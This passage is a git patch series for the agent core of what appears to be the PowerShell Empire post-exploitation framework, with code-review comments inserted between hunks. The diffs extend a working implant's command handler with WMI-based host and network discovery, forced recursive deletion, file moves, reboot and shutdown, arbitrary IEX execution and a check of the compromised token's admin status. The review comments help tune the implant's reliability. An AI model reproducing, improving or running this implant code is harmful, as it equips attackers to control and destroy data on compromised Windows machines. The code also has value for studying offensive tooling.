From e68870f143eb2595c1a8fb9c19ee70fd4b5f7d95 Mon Sep 17 00:00:00 2001 From: Harmj0y Date: Wed, 19 Aug 2015 18:16:01 -0400 Subject: [PATCH 01/11] the following agent commands now use WMI instead of native binaries: ps, tasklist, ipconfig, ifconfig --- data/agent/agent.ps1 | 119 ++++++++++++++++++++++++++++--------------- 1 file changed, 79 insertions(+), 40 deletions(-) diff --git a/data/agent/agent.ps1 b/data/agent/agent.ps1 index 9119d80..1efaf90 100644 --- a/data/agent/agent.ps1 +++ b/data/agent/agent.ps1 
@@ -315,57 +315,96 @@ function Invoke-Empire { mv { if ($cmdargs.length -ne ""){ $output = mv $cmdargs }} arp { $output = arp -a } netstat { $output = netstat -a } - ipconfig { $output = ipconfig -all } - ifconfig { $output = ipconfig -all } + ipconfig { + $output = Get-WmiObject -class "Win32_NetworkAdapterConfiguration" | ? {$_.IPEnabled -Match "True"} | % { + $out = New-Object psobject + $out | Add-Member Noteproperty 'Description' $_.Description + $out | Add-Member Noteproperty 'MACAddress' $_.MACAddress + $out | Add-Member Noteproperty 'DHCPEnabled' $_.DHCPEnabled + $out | Add-Member Noteproperty 'IPAddress' $($_.IPAddress -join ",") + $out | Add-Member Noteproperty 'IPSubnet' $($_.IPSubnet -join ",") + $out | Add-Member Noteproperty 'DefaultIPGateway' $($_.DefaultIPGateway -join ",") + $out | Add-Member Noteproperty 'DNSServer' $($_.DNSServerSearchOrder -join ",") + $out | Add-Member Noteproperty 'DNSHostName' $_.DNSHostName + $out | Add-Member Noteproperty 'DNSSuffix' $($_.DNSDomainSuffixSearchOrder -join ",") + $out + } | fl | Out-String | %{$_ + "`n"} + } + ifconfig { + $output = Get-WmiObject -class "Win32_NetworkAdapterConfiguration" | ? {$_.IPEnabled -Match "True"} | % { + $out = New-Object psobject + $out | Add-Member Noteproperty 'Description' $_.Description + $out | Add-Member Noteproperty 'MACAddress' $_.MACAddress + $out | Add-Member Noteproperty 'DHCPEnabled' $_.DHCPEnabled + $out | Add-Member Noteproperty 'IPAddress' $($_.IPAddress -join ",") + $out | Add-Member Noteproperty 'IPSubnet' $($_.IPSubnet -join ",") + $out | Add-Member Noteproperty 'DefaultIPGateway' $($_.DefaultIPGateway -join ",") + $out | Add-Member Noteproperty 'DNSServer' $($_.DNSServerSearchOrder -join ",") + $out | Add-Member Noteproperty 'DNSHostName' $_.DNSHostName + $out | Add-Member Noteproperty 'DNSSuffix' $($_.DNSDomainSuffixSearchOrder -join ",") + $out + } | fl | Out-String | %{$_ + "`n"} + } # this is stupid how complicated it is to get this information... 
ps { - if ($cmdargs.length -ne "") { - $output = tasklist /V /FO CSV | ConvertFrom-Csv | Where-Object {$_."Image Name" -match $cmdargs} | Select-Object -Property 'Image Name', 'PID', 'User Name', 'Mem Usage' - } - else { - $output = tasklist /V /FO CSV | ConvertFrom-Csv | ?{$_.'Image Name' -ne "tasklist.exe"} | Select-Object -Property 'Image Name', 'PID', 'User Name', 'Mem Usage' - } - if ([System.IntPtr]::Size -eq 4){ - # if we're running ps on an x86 architecture - $output = $output | % { - $process = Get-Process -Id $_.PID + $owners = @{} + gwmi win32_process | % {$o = $_.getowner(); if(-not $($o.User)){$o="N/A"} else {$o="$($o.Domain)\$($o.User)"}; $owners[$_.handle] = $o} + if($cmdargs -ne "") { $p = $cmdargs } + else{ $p = "*" } + $output = Get-Process $p | % { + $arch = "x64" + if ([System.IntPtr]::Size -eq 4){ $arch = "x86" - $out = New-Object psobject - $out | Add-Member Noteproperty 'ProcessName' $_.'Image Name' - $out | Add-Member Noteproperty 'PID' $_.PID - $out | Add-Member Noteproperty 'Arch' $arch - $out | Add-Member Noteproperty 'UserName' $_.'User Name' - $out | Add-Member Noteproperty 'MemUsage' $_.'Mem Usage' - $out - } | ft -wrap - } - else { - # otherwise we're x64 - $output = $output | % { - $process = Get-Process -Id $_.PID - $arch = "x64" - $modules = $process.modules - foreach($module in $process.modules) { + } + else{ + foreach($module in $_.modules) { if([System.IO.Path]::GetFileName($module.FileName).ToLower() -eq "wow64.dll") { $arch = "x86" break } } - $out = New-Object psobject - $out | Add-Member Noteproperty 'ProcessName' $_.'Image Name' - $out | Add-Member Noteproperty 'PID' $_.PID - $out | Add-Member Noteproperty 'Arch' $arch - $out | Add-Member Noteproperty 'UserName' $_.'User Name' - $out | Add-Member Noteproperty 'MemUsage' $_.'Mem Usage' - $out - } | ft -wrap - } + } + $out = New-Object psobject + $out | Add-Member Noteproperty 'ProcessName' $_.ProcessName + $out | Add-Member Noteproperty 'PID' $_.ID + $out | Add-Member 
Noteproperty 'Arch' $arch + $out | Add-Member Noteproperty 'UserName' $owners[$_.id.tostring()] + $mem = "{0:N2} MB" -f $($_.WS/1MB) + $out | Add-Member Noteproperty 'MemUsage' $mem + $out + } | Sort-Object -Property PID } - tasklist { $output = tasklist /V /FO CSV | ConvertFrom-Csv | Select-Object -Property 'Image Name', 'PID', 'Session Name', 'User Name', 'Mem Usage' | ft -wrap} + tasklist { + $owners = @{} + gwmi win32_process | % {$o = $_.getowner(); if(-not $($o.User)){$o="N/A"} else {$o="$($o.Domain)\$($o.User)"}; $owners[$_.handle] = $o} + if($cmdargs -ne "") { $p = $cmdargs } + else{ $p = "*" } + $output = Get-Process $p | % { + $arch = "x64" + if ([System.IntPtr]::Size -eq 4){ + $arch = "x86" + } + else{ + foreach($module in $_.modules) { + if([System.IO.Path]::GetFileName($module.FileName).ToLower() -eq "wow64.dll") { + $arch = "x86" + break + } + } + } + $out = New-Object psobject + $out | Add-Member Noteproperty 'ProcessName' $_.ProcessName + $out | Add-Member Noteproperty 'PID' $_.ID + $out | Add-Member Noteproperty 'Arch' $arch + $out | Add-Member Noteproperty 'UserName' $owners[$_.id.tostring()] + $mem = "{0:N2} MB" -f $($_.WS/1MB) + $out | Add-Member Noteproperty 'MemUsage' $mem + $out + } | Sort-Object -Property PID + } getpid { $output = [System.Diagnostics.Process]::GetCurrentProcess() | ft -wrap } - net { if ($cmdargs.length -ne ""){ $output = net $cmdargs }} route { if ($cmdargs.length -eq ""){ $output = route print } else { $output = route $cmdargs } @@ -380,7 +419,7 @@ function Invoke-Empire { else { $output = IEX "$cmd $cmdargs" } } } - "`n"+($output | format-table -wrap | out-string) + "`n"+($output | Format-Table -wrap | Out-String) } function Start-AgentJob { From 109fa29f60e2e345c3b099e6a9a3fe31bd56b073 Mon Sep 17 00:00:00 2001 
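Review bot: `Get-Process $p` in the new ps arm has no `-ErrorAction`, and the `foreach($module in $_.modules)` walk has no try/catch, so a name filter that matches nothing, or a process whose module list the current token cannot open, writes to the error stream rather than into `$output`, and the operator receives a shorter table with no hint that anything was skipped. `Get-Process $p -ErrorAction SilentlyContinue` plus a `try { ... } catch { $arch = "?" }` around the module loop keeps every PID in the listing and labels the ones that could not be inspected. The `? {$_.IPEnabled -Match "True"}` filter in the ipconfig arm regex-matches a Boolean coerced to a string; `? { $_.IPEnabled }` expresses the same test without the coercion.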
From: Harmj0y Date: Wed, 19 Aug 2015 18:33:04 -0400 Subject: [PATCH 02/11] Combined code components for agent.ps1 shell command section. --- data/agent/agent.ps1 | 87 +++++--------------------------------------- 1 file changed, 10 insertions(+), 77 deletions(-) diff --git a/data/agent/agent.ps1 b/data/agent/agent.ps1 index 1efaf90..ff6d050 100644 --- a/data/agent/agent.ps1 +++ b/data/agent/agent.ps1 @@ -252,16 +252,8 @@ function Invoke-Empire { } $output = "" - switch ($cmd){ - ls { - if ($cmdargs.length -eq ""){ - $output = Get-ChildItem -force | select lastwritetime,length,name - } - else { - $output = Get-ChildItem -force -path $cmdargs | select lastwritetime,length,name - } - } - dir { + switch -regex ($cmd){ + '(ls|dir)' { if ($cmdargs.length -eq ""){ $output = Get-ChildItem -force | select lastwritetime,length,name } @@ -279,26 +271,15 @@ function Invoke-Empire { } } } - rm { + '(rm|del|rmdir)' { if ($cmdargs.length -ne ""){ try { - Remove-Item $cmdargs -ErrorAction Stop; + Remove-Item -Force -Recurse $cmdargs -ErrorAction Stop; $output = "$cmdargs deleted" } catch { $output=$_.Exception; - } - } - } - del { - if ($cmdargs.length -ne ""){ - try { - Remove-Item $cmdargs -ErrorAction Stop; - $output = "$cmdargs deleted" - } - catch { - $output=$_.Exception; - } + } } } pwd { $output = pwd } @@ -311,11 +292,10 @@ function Invoke-Empire { } } mkdir { if ($cmdargs.length -ne ""){ $output = mkdir $cmdargs }} - rmdir { if ($cmdargs.length -ne ""){ $output = rmdir $cmdargs }} mv { if ($cmdargs.length -ne ""){ $output = mv $cmdargs }} arp { $output = arp -a } netstat { $output = netstat -a } - ipconfig { + '(ipconfig|ifconfig)' { $output = Get-WmiObject -class "Win32_NetworkAdapterConfiguration" | ? {$_.IPEnabled -Match "True"} | % { $out = New-Object psobject $out | Add-Member Noteproperty 'Description' $_.Description 
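Review bot: `switch -regex ($cmd)` with the unanchored, case-insensitive pattern `'(ls|dir)'` fires for any command token that merely contains those letters, and PowerShell's switch keeps testing later arms after a match, so `mkdir x` and `rmdir x` first run the ls/dir arm's Get-ChildItem against `x` (an error for a directory that does not exist yet) before their own arm executes. Anchor every pattern in this switch, e.g. `'^(ls|dir)$'`; a trailing `break` alone would not help, because the wrong arm runs first. Invoke-ShellCommand begins before this hunk.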
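Review bot: The merged `'(rm|del|rmdir)'` arm applies `-Force -Recurse` to plain `rm` and `del` as well, so a directory name, or a wildcard that `-Path` expands, now removes a whole tree on the target with no confirmation, where the replaced per-alias `Remove-Item $cmdargs` did not recurse. Consider keeping `-Recurse` for `rmdir` only and taking the other two literally, e.g. `Remove-Item -Force -LiteralPath $cmdargs -ErrorAction Stop`, so a mistyped path in an operator session cannot wipe a subtree.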
@@ -330,24 +310,8 @@ function Invoke-Empire { $out } | fl | Out-String | %{$_ + "`n"} } - ifconfig { - $output = Get-WmiObject -class "Win32_NetworkAdapterConfiguration" | ? {$_.IPEnabled -Match "True"} | % { - $out = New-Object psobject - $out | Add-Member Noteproperty 'Description' $_.Description - $out | Add-Member Noteproperty 'MACAddress' $_.MACAddress - $out | Add-Member Noteproperty 'DHCPEnabled' $_.DHCPEnabled - $out | Add-Member Noteproperty 'IPAddress' $($_.IPAddress -join ",") - $out | Add-Member Noteproperty 'IPSubnet' $($_.IPSubnet -join ",") - $out | Add-Member Noteproperty 'DefaultIPGateway' $($_.DefaultIPGateway -join ",") - $out | Add-Member Noteproperty 'DNSServer' $($_.DNSServerSearchOrder -join ",") - $out | Add-Member Noteproperty 'DNSHostName' $_.DNSHostName - $out | Add-Member Noteproperty 'DNSSuffix' $($_.DNSDomainSuffixSearchOrder -join ",") - $out - } | fl | Out-String | %{$_ + "`n"} - } - # this is stupid how complicated it is to get this information... - ps { + '(ps|tasklist)' { $owners = @{} gwmi win32_process | % {$o = $_.getowner(); if(-not $($o.User)){$o="N/A"} else {$o="$($o.Domain)\$($o.User)"}; $owners[$_.handle] = $o} if($cmdargs -ne "") { $p = $cmdargs } 
@@ -375,44 +339,13 @@ function Invoke-Empire { $out } | Sort-Object -Property PID } - - tasklist { - $owners = @{} - gwmi win32_process | % {$o = $_.getowner(); if(-not $($o.User)){$o="N/A"} else {$o="$($o.Domain)\$($o.User)"}; $owners[$_.handle] = $o} - if($cmdargs -ne "") { $p = $cmdargs } - else{ $p = "*" } - $output = Get-Process $p | % { - $arch = "x64" - if ([System.IntPtr]::Size -eq 4){ - $arch = "x86" - } - else{ - foreach($module in $_.modules) { - if([System.IO.Path]::GetFileName($module.FileName).ToLower() -eq "wow64.dll") { - $arch = "x86" - break - } - } - } - $out = New-Object psobject - $out | Add-Member Noteproperty 'ProcessName' $_.ProcessName - $out | Add-Member Noteproperty 'PID' $_.ID - $out | Add-Member Noteproperty 'Arch' $arch - $out | Add-Member Noteproperty 'UserName' $owners[$_.id.tostring()] - $mem = "{0:N2} MB" -f $($_.WS/1MB) - $out | Add-Member Noteproperty 'MemUsage' $mem - $out - } | Sort-Object -Property PID - } - getpid { $output = [System.Diagnostics.Process]::GetCurrentProcess() | ft -wrap } + getpid { $output = [System.Diagnostics.Process]::GetCurrentProcess() } route { if ($cmdargs.length -eq ""){ $output = route print } else { $output = route $cmdargs } } - whoami { [Security.Principal.WindowsIdentity]::GetCurrent().Name | Out-String } - getuid { [Security.Principal.WindowsIdentity]::GetCurrent().Name | Out-String } - reboot { Restart-Computer -force } - restart { Restart-Computer -force } + '(whoami|getuid)' { [Security.Principal.WindowsIdentity]::GetCurrent().Name } + '(reboot|restart)' { Restart-Computer -force } shutdown { Stop-Computer -force } default { if ($cmdargs.length -eq ""){ $output = IEX $cmd } From ae741e2c857919f640e71f2e52e08fb3077e5bf3 Mon Sep 17 00:00:00 2001 From: Harmj0y Date: Wed, 19 Aug 2015 20:51:36 -0400 Subject: [PATCH 03/11] Implement agent route command in WMI. --- changelog | 1 + data/agent/agent.ps1 | 29 ++++++++++++++++++++++++++--- 2 files changed, 27 insertions(+), 3 deletions(-) 
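Review bot: `'(reboot|restart)' { Restart-Computer -force }` is an unanchored, case-insensitive regex arm, so any command token containing `restart` — `Restart-Service` sent through the agent is the obvious one — reboots the host instead of reaching the `default` passthrough; `'^(reboot|restart)$'` closes that. The merged `'(whoami|getuid)'` arm also emits the name straight to the pipeline rather than assigning `$output`, so it bypasses the Format-Table/Out-String step this function ends with; `$output = [Security.Principal.WindowsIdentity]::GetCurrent().Name` keeps it consistent with the other arms. The function's closing lines fall outside the hunk.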
diff --git a/changelog b/changelog index 91a08ac..10f62e4 100644 --- a/changelog +++ b/changelog @@ -4,6 +4,7 @@ -Added collection/packet_capture for netsh event tracing -Added management/zipfolder for native folder compression -Corrected menu behavior on agent exit, bug fix on some dir behavior +-Started porting native shell commands to WMI in the agent core ============ 8/16/2015 - RELEASE 1.1 diff --git a/data/agent/agent.ps1 b/data/agent/agent.ps1 index ff6d050..365858b 100644 --- a/data/agent/agent.ps1 +++ b/data/agent/agent.ps1 @@ -210,7 +210,7 @@ function Invoke-Empire { function Get-Sysinfo { $str = $Servers[$ServerIndex] $str += '|' + [Environment]::UserDomainName+'|'+[Environment]::UserName+'|'+[Environment]::MachineName; - $p = (gwmi Win32_NetworkAdapterConfiguration|Where{$_.IPAddress}|Select -Expand IPAddress); + $p = (Get-WmiObject Win32_NetworkAdapterConfiguration|Where{$_.IPAddress}|Select -Expand IPAddress); $str += '|' +@{$true=$p[0];$false=$p}[$p.Length -lt 6]; $str += '|' +(Get-WmiObject Win32_OperatingSystem).Name.split('|')[0]; # if we're SYSTEM, we're high integrity @@ -313,7 +313,7 @@ function Invoke-Empire { # this is stupid how complicated it is to get this information... '(ps|tasklist)' { $owners = @{} - gwmi win32_process | % {$o = $_.getowner(); if(-not $($o.User)){$o="N/A"} else {$o="$($o.Domain)\$($o.User)"}; $owners[$_.handle] = $o} + Get-WmiObject win32_process | % {$o = $_.getowner(); if(-not $($o.User)){$o="N/A"} else {$o="$($o.Domain)\$($o.User)"}; $owners[$_.handle] = $o} if($cmdargs -ne "") { $p = $cmdargs } else{ $p = "*" } $output = Get-Process $p | % { 
@@ -341,7 +341,30 @@ function Invoke-Empire { } getpid { $output = [System.Diagnostics.Process]::GetCurrentProcess() } route { - if ($cmdargs.length -eq ""){ $output = route print } + if (($cmdargs.length -eq "") -or ($cmdargs.lower() -eq "print")){ + # build a table of adapter interfaces indexes -> IP address for the adapater + $adapters = @{} + Get-WmiObject Win32_NetworkAdapterConfiguration | %{ $adapters[[int]($_.InterfaceIndex)] = $_.IPAddress } + $output = Get-WmiObject win32_IP4RouteTable | %{ + $out = New-Object psobject + $out | Add-Member Noteproperty 'Destination' $_.Destination + $out | Add-Member Noteproperty 'Netmask' $_.Mask + if ($_.NextHop -eq "0.0.0.0"){ + $out | Add-Member Noteproperty 'NextHop' "On-link" + } + else{ + $out | Add-Member Noteproperty 'NextHop' $_.NextHop + } + if($adapters[$_.InterfaceIndex] -and ($adapters[$_.InterfaceIndex] -ne "")){ + $out | Add-Member Noteproperty 'Interface' $($adapters[$_.InterfaceIndex] -join ",") + } + else { + $out | Add-Member Noteproperty 'Interface' '127.0.0.1' + } + $out | Add-Member Noteproperty 'Metric' $_.Metric1 + $out + } | ft -autosize | Out-String + } else { $output = route $cmdargs } } '(whoami|getuid)' { [Security.Principal.WindowsIdentity]::GetCurrent().Name } From fdfb0ba33797163b9bc0e5407f7ac959a22b0a7b Mon Sep 17 00:00:00 2001 From: Harmj0y Date: Wed, 19 Aug 2015 21:08:57 -0400 Subject: [PATCH 04/11] Removed "whoami" from the high integrity check. --- data/agent/agent.ps1 | 2 +- data/agent/stager.ps1 | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/data/agent/agent.ps1 b/data/agent/agent.ps1 index 365858b..fd48d8c 100644 --- a/data/agent/agent.ps1 +++ b/data/agent/agent.ps1 
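Review bot: `$cmdargs.lower()` is not a .NET String method (`ToLower()` is), so `route print` raises a method-not-found error inside the `if` condition, neither branch runs and `$output` stays empty; only the bare `route` form, which short-circuits on `$cmdargs.length -eq ""`, ever reaches the WMI path. Change it to `($cmdargs.ToLower() -eq "print")`. The `[int]` cast on the adapter key appears to exist because the two WMI classes expose InterfaceIndex with different integer widths; a one-line comment such as `# cast: the adapter class reports InterfaceIndex as uint32, the route table as sint32` would spare the next reader re-deriving why the lookup works.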
@@ -219,7 +219,7 @@ function Invoke-Empire { } else{ # otherwise check the groups - $str += '|'+($(whoami /groups) -join "").Contains("High Mandatory Level"); + $str += '|'+ ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator") } $n = [System.Diagnostics.Process]::GetCurrentProcess(); $str += '|'+$n.ProcessName+'|'+$n.Id; diff --git a/data/agent/stager.ps1 b/data/agent/stager.ps1 index 1d42872..e7ae0e9 100644 --- a/data/agent/stager.ps1 +++ b/data/agent/stager.ps1 @@ -72,7 +72,7 @@ function Start-Negotiate{ # detect if we're SYSTEM or otherwise high-integrity if(([Environment]::UserName).ToLower() -eq "system"){$i+='|True'} - else{$i+='|'+($(whoami /groups) -join "").Contains("High Mandatory Level");} + else {$i += "|" +([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")} # get the current process name and ID $n=[System.Diagnostics.Process]::GetCurrentProcess(); From 39d974bb094482ff56ec168b99af395f656a0518 Mon Sep 17 00:00:00 2001 From: Harmj0y Date: Thu, 20 Aug 2015 14:35:42 -0400 Subject: [PATCH 05/11] Continued porting native shell commands to WMI replacents in agent core In agent menu, 'shell CMD' now runs straight IEX CMD, and 'help agentcmds' shows safe aliases Modified ./setup/reset.sh to work from parent or ./setup/ folders --- changelog | 6 + data/agent/agent.ps1 | 260 +++++++++++++++++++++++-------------------- lib/common/empire.py | 33 +++--- setup/reset.sh | 11 +- 4 files changed, 172 insertions(+), 138 deletions(-) diff --git a/changelog b/changelog index 10f62e4..b9ca12b 100644 --- a/changelog +++ b/changelog 
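Review bot: The new check answers "is the current token a member of Administrators", not "is the process high-integrity" as the `# otherwise check the groups` comment and the field's `|True` meaning suggest; under UAC the two normally agree, since the filtered token carries the Administrators SID as deny-only and IsInRole disregards it, but a token elevated through a group other than Administrators, or a host with UAC disabled, can report differently. Reword the comment to match what is computed, e.g. `# otherwise: is the (unfiltered) token a member of BUILTIN\Administrators`, so consumers of this field know the semantics moved. Dropping the `whoami.exe` child process is the right call for an agent; the same substitution in stager.ps1 below carries the same caveat.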
@@ -1,3 +1,9 @@ +8/20/2015 +--------- +-Continued porting native shell commands to WMI replacents in agent core +-In agent menu, 'shell CMD' now runs straight IEX CMD, and 'help agentcmds' shows safe aliases +-Modified ./setup/reset.sh to work from parent or ./setup/ folders + 8/19/2015 --------- -Added collection/netripper, port of the NetRipper project diff --git a/data/agent/agent.ps1 b/data/agent/agent.ps1 index fd48d8c..fdb04aa 100644 --- a/data/agent/agent.ps1 +++ b/data/agent/agent.ps1 
@@ -239,140 +239,157 @@ function Invoke-Empire { function Invoke-ShellCommand { param($cmd, $cmdargs="") - # extract the command and arguments - $parts = $cmd.split(" ") - $cmd = $parts[0] - if ($parts.length -ne 1){ - $cmdargs = $parts[1..$parts.length] -join " " - # if this is a UNC path, forget the fancy formatting so we can get the stupid path to work - if ($cmdargs.contains("\\")){ - $cmdargs = $cmdargs.trim("`"").trim("'") - $cmdargs = "$cmdargs" - } + if ($cmdargs.StartsWith("\\")) { + # UNC path normalization for PowerShell + $cmdargs = "FileSystem::$cmdargs" } $output = "" - switch -regex ($cmd){ - '(ls|dir)' { - if ($cmdargs.length -eq ""){ - $output = Get-ChildItem -force | select lastwritetime,length,name - } - else { - try{ - if ($cmdargs.StartsWith("\\")) { - $output = Get-ChildItem -force -path "FileSystem::$cmdargs" -ErrorAction Stop | select lastwritetime,length,name - } - else { + if ($cmd.ToLower() -eq "shell") { + # if we have a straight 'shell' command, skip the aliases + if ($cmdargs.length -eq ""){ $output = "no shell command supplied" } + else { $output = IEX "$cmdargs" } + } + else { + switch -regex ($cmd) { + '(ls|dir)' { + if ($cmdargs.length -eq "") { + $output = Get-ChildItem -force | select lastwritetime,length,name + } + else { + try{ $output = Get-ChildItem -force -path "$cmdargs" -ErrorAction Stop | select lastwritetime,length,name } - } - catch [System.Management.Automation.ActionPreferenceStopException]{ - $output = "[!] Error: $_ (or cannot be accessed)." 
- } - } - } - '(rm|del|rmdir)' { - if ($cmdargs.length -ne ""){ - try { - Remove-Item -Force -Recurse $cmdargs -ErrorAction Stop; - $output = "$cmdargs deleted" - } - catch { - $output=$_.Exception; - } - } - } - pwd { $output = pwd } - cat { if ($cmdargs.length -ne ""){ $output = cat $cmdargs }} - cd { - if ($cmdargs.length -ne "") - { - cd $cmdargs - $output = pwd - } - } - mkdir { if ($cmdargs.length -ne ""){ $output = mkdir $cmdargs }} - mv { if ($cmdargs.length -ne ""){ $output = mv $cmdargs }} - arp { $output = arp -a } - netstat { $output = netstat -a } - '(ipconfig|ifconfig)' { - $output = Get-WmiObject -class "Win32_NetworkAdapterConfiguration" | ? {$_.IPEnabled -Match "True"} | % { - $out = New-Object psobject - $out | Add-Member Noteproperty 'Description' $_.Description - $out | Add-Member Noteproperty 'MACAddress' $_.MACAddress - $out | Add-Member Noteproperty 'DHCPEnabled' $_.DHCPEnabled - $out | Add-Member Noteproperty 'IPAddress' $($_.IPAddress -join ",") - $out | Add-Member Noteproperty 'IPSubnet' $($_.IPSubnet -join ",") - $out | Add-Member Noteproperty 'DefaultIPGateway' $($_.DefaultIPGateway -join ",") - $out | Add-Member Noteproperty 'DNSServer' $($_.DNSServerSearchOrder -join ",") - $out | Add-Member Noteproperty 'DNSHostName' $_.DNSHostName - $out | Add-Member Noteproperty 'DNSSuffix' $($_.DNSDomainSuffixSearchOrder -join ",") - $out - } | fl | Out-String | %{$_ + "`n"} - } - # this is stupid how complicated it is to get this information... 
- '(ps|tasklist)' { - $owners = @{} - Get-WmiObject win32_process | % {$o = $_.getowner(); if(-not $($o.User)){$o="N/A"} else {$o="$($o.Domain)\$($o.User)"}; $owners[$_.handle] = $o} - if($cmdargs -ne "") { $p = $cmdargs } - else{ $p = "*" } - $output = Get-Process $p | % { - $arch = "x64" - if ([System.IntPtr]::Size -eq 4){ - $arch = "x86" - } - else{ - foreach($module in $_.modules) { - if([System.IO.Path]::GetFileName($module.FileName).ToLower() -eq "wow64.dll") { - $arch = "x86" - break - } + catch [System.Management.Automation.ActionPreferenceStopException] { + $output = "[!] Error: $_ (or cannot be accessed)." } } - $out = New-Object psobject - $out | Add-Member Noteproperty 'ProcessName' $_.ProcessName - $out | Add-Member Noteproperty 'PID' $_.ID - $out | Add-Member Noteproperty 'Arch' $arch - $out | Add-Member Noteproperty 'UserName' $owners[$_.id.tostring()] - $mem = "{0:N2} MB" -f $($_.WS/1MB) - $out | Add-Member Noteproperty 'MemUsage' $mem - $out - } | Sort-Object -Property PID - } - getpid { $output = [System.Diagnostics.Process]::GetCurrentProcess() } - route { - if (($cmdargs.length -eq "") -or ($cmdargs.lower() -eq "print")){ - # build a table of adapter interfaces indexes -> IP address for the adapater - $adapters = @{} - Get-WmiObject Win32_NetworkAdapterConfiguration | %{ $adapters[[int]($_.InterfaceIndex)] = $_.IPAddress } - $output = Get-WmiObject win32_IP4RouteTable | %{ + } + '(rm|del|rmdir)' { + if ($cmdargs.length -ne "") { + try { + Remove-Item -Force -Recurse "$cmdargs" -ErrorAction Stop; + $output = "$cmdargs deleted" + } + catch { + $output=$_.Exception; + } + } + } + '(mv|move)' { + if ($cmdargs.length -ne "") { + try { + $parts = $cmdargs.split(" ") + $source = $parts[0..$($parts.length-2)] -join " " + $dest = $parts[-1] + Move-Item -LiteralPath $source -Destination $dest -Force -ErrorAction Stop + $output = "$source moved to $dest" + } + catch { + $output=$_.Exception; + } + } + } + '(copy|cp)' { + if ($cmdargs.length -ne "") { + try 
{ + $parts = $cmdargs.split(" ") + $source = $parts[0..$($parts.length-2)] -join " " + $dest = $parts[-1] + Copy-Item -LiteralPath $source -Destination $dest -Force -ErrorAction Stop + $output = "$source copied to $dest" + } + catch { + $output=$_.Exception; + } + } + } + cd { + if ($cmdargs.length -ne "") + { + cd $cmdargs + $output = pwd + } + } + '(ipconfig|ifconfig)' { + $output = Get-WmiObject -class "Win32_NetworkAdapterConfiguration" | ? {$_.IPEnabled -Match "True"} | % { $out = New-Object psobject - $out | Add-Member Noteproperty 'Destination' $_.Destination - $out | Add-Member Noteproperty 'Netmask' $_.Mask - if ($_.NextHop -eq "0.0.0.0"){ - $out | Add-Member Noteproperty 'NextHop' "On-link" + $out | Add-Member Noteproperty 'Description' $_.Description + $out | Add-Member Noteproperty 'MACAddress' $_.MACAddress + $out | Add-Member Noteproperty 'DHCPEnabled' $_.DHCPEnabled + $out | Add-Member Noteproperty 'IPAddress' $($_.IPAddress -join ",") + $out | Add-Member Noteproperty 'IPSubnet' $($_.IPSubnet -join ",") + $out | Add-Member Noteproperty 'DefaultIPGateway' $($_.DefaultIPGateway -join ",") + $out | Add-Member Noteproperty 'DNSServer' $($_.DNSServerSearchOrder -join ",") + $out | Add-Member Noteproperty 'DNSHostName' $_.DNSHostName + $out | Add-Member Noteproperty 'DNSSuffix' $($_.DNSDomainSuffixSearchOrder -join ",") + $out + } | fl | Out-String | %{$_ + "`n"} + } + # this is stupid how complicated it is to get this information... 
+ '(ps|tasklist)' { + $owners = @{} + Get-WmiObject win32_process | % {$o = $_.getowner(); if(-not $($o.User)){$o="N/A"} else {$o="$($o.Domain)\$($o.User)"}; $owners[$_.handle] = $o} + if($cmdargs -ne "") { $p = $cmdargs } + else{ $p = "*" } + $output = Get-Process $p | % { + $arch = "x64" + if ([System.IntPtr]::Size -eq 4){ + $arch = "x86" } else{ - $out | Add-Member Noteproperty 'NextHop' $_.NextHop + foreach($module in $_.modules) { + if([System.IO.Path]::GetFileName($module.FileName).ToLower() -eq "wow64.dll") { + $arch = "x86" + break + } + } } - if($adapters[$_.InterfaceIndex] -and ($adapters[$_.InterfaceIndex] -ne "")){ - $out | Add-Member Noteproperty 'Interface' $($adapters[$_.InterfaceIndex] -join ",") - } - else { - $out | Add-Member Noteproperty 'Interface' '127.0.0.1' - } - $out | Add-Member Noteproperty 'Metric' $_.Metric1 + $out = New-Object psobject + $out | Add-Member Noteproperty 'ProcessName' $_.ProcessName + $out | Add-Member Noteproperty 'PID' $_.ID + $out | Add-Member Noteproperty 'Arch' $arch + $out | Add-Member Noteproperty 'UserName' $owners[$_.id.tostring()] + $mem = "{0:N2} MB" -f $($_.WS/1MB) + $out | Add-Member Noteproperty 'MemUsage' $mem $out - } | ft -autosize | Out-String + } | Sort-Object -Property PID + } + getpid { $output = [System.Diagnostics.Process]::GetCurrentProcess() } + route { + if (($cmdargs.length -eq "") -or ($cmdargs.lower() -eq "print")){ + # build a table of adapter interfaces indexes -> IP address for the adapater + $adapters = @{} + Get-WmiObject Win32_NetworkAdapterConfiguration | %{ $adapters[[int]($_.InterfaceIndex)] = $_.IPAddress } + $output = Get-WmiObject win32_IP4RouteTable | %{ + $out = New-Object psobject + $out | Add-Member Noteproperty 'Destination' $_.Destination + $out | Add-Member Noteproperty 'Netmask' $_.Mask + if ($_.NextHop -eq "0.0.0.0"){ + $out | Add-Member Noteproperty 'NextHop' "On-link" + } + else{ + $out | Add-Member Noteproperty 'NextHop' $_.NextHop + } + if($adapters[$_.InterfaceIndex] 
-and ($adapters[$_.InterfaceIndex] -ne "")){ + $out | Add-Member Noteproperty 'Interface' $($adapters[$_.InterfaceIndex] -join ",") + } + else { + $out | Add-Member Noteproperty 'Interface' '127.0.0.1' + } + $out | Add-Member Noteproperty 'Metric' $_.Metric1 + $out + } | ft -autosize | Out-String + } + else { $output = route $cmdargs } + } + '(whoami|getuid)' { [Security.Principal.WindowsIdentity]::GetCurrent().Name } + '(reboot|restart)' { Restart-Computer -force } + shutdown { Stop-Computer -force } + default { + if ($cmdargs.length -eq ""){ $output = IEX $cmd } + else { $output = IEX "$cmd $cmdargs" } } - else { $output = route $cmdargs } - } - '(whoami|getuid)' { [Security.Principal.WindowsIdentity]::GetCurrent().Name } - '(reboot|restart)' { Restart-Computer -force } - shutdown { Stop-Computer -force } - default { - if ($cmdargs.length -eq ""){ $output = IEX $cmd } - else { $output = IEX "$cmd $cmdargs" } } } "`n"+($output | Format-Table -wrap | Out-String) @@ -700,7 +717,6 @@ function Invoke-Empire { Encode-Packet -type 40 -data "[*] File download of $path completed" } catch{ - # Write-Host "Error: $_" Encode-Packet -type 0 -data "file does not exist or cannot be accessed" } } diff --git a/lib/common/empire.py b/lib/common/empire.py index 7ad9263..24ae92b 100644 --- a/lib/common/empire.py +++ 